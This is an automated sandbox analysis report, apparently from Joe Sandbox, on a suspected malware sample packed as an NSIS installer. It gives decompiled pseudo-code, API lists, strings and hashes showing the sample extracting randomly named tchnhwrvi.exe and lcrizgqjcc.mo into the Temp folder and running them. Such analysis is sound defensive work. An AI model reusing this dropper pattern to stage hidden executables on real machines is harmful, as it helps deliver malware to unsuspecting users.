                    												L27:
                    												SendMessageW( *0x429238, 0x111, _t122, _a16);
                    												goto L28;
                    											}
                    											__eflags =  *0x42a2ec - _t136;
                    											if( *0x42a2ec == _t136) {
                    												_t99 = E0040140B(3);
                    												__eflags = _t99;
                    												if(_t99 != 0) {
                    													goto L28;
                    												}
                    												 *0x421f18 = 1;
                    												L23:
                    												_push(0x78);
                    												L24:
                    												E0040459D();
                    												goto L28;
                    											}
                    											E0040140B(_t129);
                    											 *0x421f18 = _t129;
                    											goto L23;
                    										}
                    										__eflags =  *0x40a39c - _t136; // 0x0
                    										if(__eflags <= 0) {
                    											goto L27;
                    										}
                    										_push(0xffffffff);
                    										goto L24;
                    									}
                    									_push(_t135);
                    									goto L24;
                    								}
                    								SendMessageW(_t128, 0xf3, _t136, _t136);
                    								_t103 = IsWindowEnabled(_t128);
                    								__eflags = _t103;
                    								if(_t103 == 0) {
                    									L63:
                    									return 0;
                    								}
                    								goto L15;
                    							}
                    							SetWindowLongW(_t127, _t136, _t136);
                    							return 1;
                    						}
                    						DestroyWindow( *0x429238);
                    						 *0x429238 = _t122;
                    						L60:
                    						_t145 =  *0x425748 - _t136; // 0x0
                    						if(_t145 == 0 &&  *0x429238 != _t136) {
                    							ShowWindow(_t127, 0xa);
                    							 *0x425748 = 1;
                    						}
                    						goto L63;
                    					} else {
                    						asm("sbb eax, eax");
                    						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                    						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                    							L28:
                    							return E0040462B(_a8, _t122, _a16);
                    						} else {
                    							ShowWindow(_t127, 4);
                    							goto L8;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                    • ShowWindow.USER32(?), ref: 00404121
                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                    • DestroyWindow.USER32 ref: 00404160
                    • SetWindowLongW.USER32 ref: 00404179
                    • GetDlgItem.USER32 ref: 00404198
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                    • GetDlgItem.USER32 ref: 0040425E
                    • GetDlgItem.USER32 ref: 00404268
                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                    • GetDlgItem.USER32 ref: 00404379
                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                    • EnableWindow.USER32(?,?), ref: 004043AC
                    • EnableWindow.USER32(?,?), ref: 004043C7
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                    • EnableMenuItem.USER32 ref: 004043E4
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                    • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                    • ShowWindow.USER32(?,0000000A), ref: 00404581
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                    • String ID: H7B
                    • API String ID: 2475350683-2300413410
                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    C-Code - Quality: 96%
                    			E00403D17(void* __eflags) {
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				int _v12;
                    				void _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t22;
                    				void* _t30;
                    				void* _t32;
                    				int _t33;
                    				void* _t36;
                    				int _t39;
                    				int _t40;
                    				int _t44;
                    				short _t63;
                    				WCHAR* _t65;
                    				signed char _t69;
                    				WCHAR* _t76;
                    				intOrPtr _t82;
                    				WCHAR* _t87;
                    
                    				_t82 =  *0x42a270;
                    				_t22 = E00406A35(2);
                    				_t90 = _t22;
                    				if(_t22 == 0) {
                    					_t76 = 0x423748;
                    					L"1033" = 0x30;
                    					 *0x437002 = 0x78;
                    					 *0x437004 = 0;
                    					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                    					__eflags =  *0x423748;
                    					if(__eflags == 0) {
                    						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                    					}
                    					lstrcatW(L"1033", _t76);
                    				} else {
                    					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                    				}
                    				E00403FED(_t78, _t90);
                    				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                    				 *0x42a2fc = 0x10000;
                    				if(E0040603F(_t90, 0x435800) != 0) {
                    					L16:
                    					if(E0040603F(_t98, 0x435800) == 0) {
                    						E004066A5(_t76, 0, _t82, 0x435800,  *((intOrPtr*)(_t82 + 0x118)));
                    					}
                    					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                    					 *0x429248 = _t30;
                    					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                    						L21:
                    						if(E0040140B(0) == 0) {
                    							_t32 = E00403FED(_t78, __eflags);
                    							__eflags =  *0x42a300;
                    							if( *0x42a300 != 0) {
                    								_t33 = E0040579D(_t32, 0);
                    								__eflags = _t33;
                    								if(_t33 == 0) {
                    									E0040140B(1);
                    									goto L33;
                    								}
                    								__eflags =  *0x42922c;
                    								if( *0x42922c == 0) {
                    									E0040140B(2);
                    								}
                    								goto L22;
                    							}
                    							ShowWindow( *0x423728, 5); // executed
                    							_t39 = E004069C5("RichEd20"); // executed
                    							__eflags = _t39;
                    							if(_t39 == 0) {
                    								E004069C5("RichEd32");
                    							}
                    							_t87 = L"RichEdit20W";
                    							_t40 = GetClassInfoW(0, _t87, 0x429200);
                    							__eflags = _t40;
                    							if(_t40 == 0) {
                    								GetClassInfoW(0, L"RichEdit", 0x429200);
                    								 *0x429224 = _t87;
                    								RegisterClassW(0x429200);
                    							}
                    							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                    							E00403C67(E0040140B(5), 1);
                    							return _t44;
                    						}
                    						L22:
                    						_t36 = 2;
                    						return _t36;
                    					} else {
                    						_t78 =  *0x42a260;
                    						 *0x429204 = E00401000;
                    						 *0x429210 =  *0x42a260;
                    						 *0x429214 = _t30;
                    						 *0x429224 = 0x40a3b4;
                    						if(RegisterClassW(0x429200) == 0) {
                    							L33:
                    							__eflags = 0;
                    							return 0;
                    						}
                    						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                    						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                    						goto L21;
                    					}
                    				} else {
                    					_t78 =  *(_t82 + 0x48);
                    					_t92 = _t78;
                    					if(_t78 == 0) {
                    						goto L16;
                    					}
                    					_t76 = 0x428200;
                    					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                    					_t63 =  *0x428200; // 0x22
                    					if(_t63 == 0) {
                    						goto L16;
                    					}
                    					if(_t63 == 0x22) {
                    						_t76 = 0x428202;
                    						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                    					}
                    					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                    					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                    						L15:
                    						E00406668(0x435800, E00405F37(_t76));
                    						goto L16;
                    					} else {
                    						_t69 = GetFileAttributesW(_t76);
                    						if(_t69 == 0xffffffff) {
                    							L14:
                    							E00405F83(_t76);
                    							goto L15;
                    						}
                    						_t98 = _t69 & 0x00000010;
                    						if((_t69 & 0x00000010) != 0) {
                    							goto L15;
                    						}
                    						goto L14;
                    					}
                    				}
                    			}

                    APIs
                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                    • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,?,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7476FAA0), ref: 00403E18
                    • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,?,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                    • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,00000000,?), ref: 00403E36
                    • LoadImageW.USER32 ref: 00403E7F
                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                    • RegisterClassW.USER32 ref: 00403EBC
                    • SystemParametersInfoW.USER32 ref: 00403ED4
                    • CreateWindowExW.USER32 ref: 00403F09
                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                    • GetClassInfoW.USER32 ref: 00403F6B
                    • GetClassInfoW.USER32 ref: 00403F78
                    • RegisterClassW.USER32 ref: 00403F81
                    • DialogBoxParamW.USER32 ref: 00403FA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                    • API String ID: 1975747703-810996470
                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                    C-Code - Quality: 98%
                    			E004030D0(void* __eflags, signed int _a4) {
                    				DWORD* _v8;
                    				DWORD* _v12;
                    				intOrPtr _v16;
                    				long _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				short _v560;
                    				long _t54;
                    				void* _t57;
                    				void* _t62;
                    				intOrPtr _t65;
                    				void* _t68;
                    				intOrPtr* _t70;
                    				long _t82;
                    				signed int _t89;
                    				intOrPtr _t92;
                    				long _t94;
                    				void* _t102;
                    				void* _t106;
                    				long _t107;
                    				long _t110;
                    				void* _t111;
                    
                    				_t94 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				 *0x42a26c = GetTickCount() + 0x3e8;
                    				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe", 0x400);
                    				_t106 = E00406158(L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe", 0x80000000, 3);
                    				 *0x40a018 = _t106;
                    				if(_t106 == 0xffffffff) {
                    					return L"Error launching installer";
                    				}
                    				E00406668(0x436800, L"C:\\Users\\jones\\Desktop\\PhviZrlpkW.exe");
                    				E00406668(0x439000, E00405F83(0x436800));
                    				_t54 = GetFileSize(_t106, 0);
                    				 *0x420f00 = _t54;
                    				_t110 = _t54;
                    				if(_t54 <= 0) {
                    					L24:
                    					E0040302E(1);
                    					if( *0x42a274 == _t94) {
                    						goto L32;
                    					}
                    					if(_v12 == _t94) {
                    						L28:
                    						_t57 = GlobalAlloc(0x40, _v20); // executed
                    						_t111 = _t57;
                    						E00406B90(0x40ce68);
                    						E00406187(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                    						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                    						 *0x40a01c = _t62;
                    						if(_t62 != 0xffffffff) {
                    							_t65 = E004035F8( *0x42a274 + 0x1c);
                    							 *0x420f04 = _t65;
                    							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                    							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                    							if(_t68 == _v20) {
                    								 *0x42a270 = _t111;
                    								 *0x42a278 =  *_t111;
                    								if((_v40 & 0x00000001) != 0) {
                    									 *0x42a27c =  *0x42a27c + 1;
                    								}
                    								_t45 = _t111 + 0x44; // 0x44
                    								_t70 = _t45;
                    								_t102 = 8;
                    								do {
                    									_t70 = _t70 - 8;
                    									 *_t70 =  *_t70 + _t111;
                    									_t102 = _t102 - 1;
                    								} while (_t102 != 0);
                    								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                    								E00406113(0x42a280, _t111 + 4, 0x40);
                    								return 0;
                    							}
                    							goto L32;
                    						}
                    						return L"Error writing temporary file. Make sure your temp folder is valid.";
                    					}
                    					E004035F8( *0x420ef0);
                    					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                    						goto L32;
                    					} else {
                    						goto L28;
                    					}
                    				} else {
                    					do {
                    						_t107 = _t110;
                    						asm("sbb eax, eax");
                    						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                    						if(_t110 >= _t82) {
                    							_t107 = _t82;
                    						}
                    						if(E004035E2(0x418ef0, _t107) == 0) {
                    							E0040302E(1);
                    							L32:
                    							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                    						}
                    						if( *0x42a274 != 0) {
                    							if((_a4 & 0x00000002) == 0) {
                    								E0040302E(0);
                    							}
                    							goto L20;
                    						}
                    						E00406113( &_v40, 0x418ef0, 0x1c);
                    						_t89 = _v40;
                    						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                    							_a4 = _a4 | _t89;
                    							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                    							_t92 = _v16;
                    							 *0x42a274 =  *0x420ef0;
                    							if(_t92 > _t110) {
                    								goto L32;
                    							}
                    							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                    								_v12 = _v12 + 1;
                    								_t110 = _t92 - 4;
                    								if(_t107 > _t110) {
                    									_t107 = _t110;
                    								}
                    								goto L20;
                    							} else {
                    								break;
                    							}
                    						}
                    						L20:
                    						if(_t110 <  *0x420f00) {
                    							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                    						}
                    						 *0x420ef0 =  *0x420ef0 + _t107;
                    						_t110 = _t110 - _t107;
                    					} while (_t110 != 0);
                    					_t94 = 0;
                    					goto L24;
                    				}
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 004030E4
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PhviZrlpkW.exe,00000400), ref: 00403100
                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 0040615C
                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\PhviZrlpkW.exe,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 00403149
                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PhviZrlpkW.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                    • API String ID: 2803837635-966669455
                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                    C-Code - Quality: 77%
                    			E0040176F(FILETIME* __ebx, void* __eflags) {
                    				void* __esi;
                    				void* _t35;
                    				void* _t43;
                    				void* _t45;
                    				FILETIME* _t51;
                    				FILETIME* _t64;
                    				void* _t66;
                    				signed int _t72;
                    				FILETIME* _t73;
                    				FILETIME* _t77;
                    				signed int _t79;
                    				WCHAR* _t81;
                    				void* _t83;
                    				void* _t84;
                    				void* _t86;
                    
                    				_t77 = __ebx;
                    				 *(_t86 - 8) = E00402DA6(0x31);
                    				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                    				_t35 = E00405FAE( *(_t86 - 8));
                    				_push( *(_t86 - 8));
                    				_t81 = L"\"C:\\";
                    				if(_t35 == 0) {
                    					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
                    				} else {
                    					E00406668();
                    				}
                    				E004068EF(_t81);
                    				while(1) {
                    					__eflags =  *(_t86 + 8) - 3;
                    					if( *(_t86 + 8) >= 3) {
                    						_t66 = E0040699E(_t81);
                    						_t79 = 0;
                    						__eflags = _t66 - _t77;
                    						if(_t66 != _t77) {
                    							_t73 = _t66 + 0x14;
                    							__eflags = _t73;
                    							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                    						}
                    						asm("sbb eax, eax");
                    						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                    						__eflags = _t72;
                    						 *(_t86 + 8) = _t72;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) == _t77) {
                    						E00406133(_t81);
                    					}
                    					__eflags =  *(_t86 + 8) - 1;
                    					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                    					__eflags = _t43 - 0xffffffff;
                    					 *(_t86 - 0x38) = _t43;
                    					if(_t43 != 0xffffffff) {
                    						break;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) != _t77) {
                    						E004056CA(0xffffffe2,  *(_t86 - 8));
                    						__eflags =  *(_t86 + 8) - 2;
                    						if(__eflags == 0) {
                    							 *((intOrPtr*)(_t86 - 4)) = 1;
                    						}
                    						L31:
                    						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                    						__eflags =  *0x42a2e8;
                    						goto L32;
                    					} else {
                    						E00406668(0x40b5f8, _t83);
                    						E00406668(_t83, _t81);
                    						E004066A5(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                    						E00406668(_t83, 0x40b5f8);
                    						_t64 = E00405CC8("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                    						__eflags = _t64;
                    						if(_t64 == 0) {
                    							continue;
                    						} else {
                    							__eflags = _t64 == 1;
                    							if(_t64 == 1) {
                    								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                    								L32:
                    								_t51 = 0;
                    								__eflags = 0;
                    							} else {
                    								_push(_t81);
                    								_push(0xfffffffa);
                    								E004056CA();
                    								L29:
                    								_t51 = 0x7fffffff;
                    							}
                    						}
                    					}
                    					L33:
                    					return _t51;
                    				}
                    				E004056CA(0xffffffea,  *(_t86 - 8));
                    				 *0x42a314 =  *0x42a314 + 1;
                    				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                    				 *0x42a314 =  *0x42a314 - 1;
                    				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                    				_t84 = _t45;
                    				if( *(_t86 - 0x24) != 0xffffffff) {
                    					L22:
                    					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                    				} else {
                    					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                    					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                    						goto L22;
                    					}
                    				}
                    				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                    				__eflags = _t84 - _t77;
                    				if(_t84 >= _t77) {
                    					goto L31;
                    				} else {
                    					__eflags = _t84 - 0xfffffffe;
                    					if(_t84 != 0xfffffffe) {
                    						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                    					} else {
                    						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                    						lstrcatW(_t81,  *(_t86 - 8));
                    					}
                    					_push(0x200010);
                    					_push(_t81);
                    					E00405CC8();
                    					goto L29;
                    				}
                    				goto L33;
                    			}



















                    APIs
                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                    • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00000000,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00436000,?,?,00000031), ref: 004017D5
                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
